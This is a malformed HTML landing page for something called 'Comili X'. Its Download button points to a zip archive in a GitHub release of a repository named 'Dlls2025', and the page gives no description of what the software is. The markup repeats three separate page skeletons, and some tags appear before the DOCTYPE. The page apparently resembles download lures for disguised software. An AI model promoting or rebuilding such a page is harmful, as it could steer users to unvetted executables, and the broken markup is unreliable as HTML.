<h1 style="color: #ff5733;">Welcome To Comili X!</h1>

<link rel="stylesheet" href="style.css">
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="style.css">


<!DOCTYPE html>
<html>
<head>
  <style>
    body, html {
      height: 100%;
      margin: 0;
    }
    .container {
      display: flex;
      flex-direction: column;
      justify-content: flex-end;
      height: 100%;
    }
    .button-container {
      text-align: center;
      padding: 20px;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="button-container">
  
<button onclick="window.location.href='https://github.com/TheDangours/Dlls2025/releases/download/da21/Comili.X.zip'">
Download
</button>

    </div>
  </div>
</body>
</html>

<!DOCTYPE html>
<html>
<head>
  <style>
    body {
      margin: 0;
      background-color: black;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh; /* 100% of the viewport height */
    }

    img {
      max-width: 100%;
      height: auto;
    }
  </style>
</head>
<body>
  <img src="image.png" alt="Non-clickable Image">
</body>
</html>
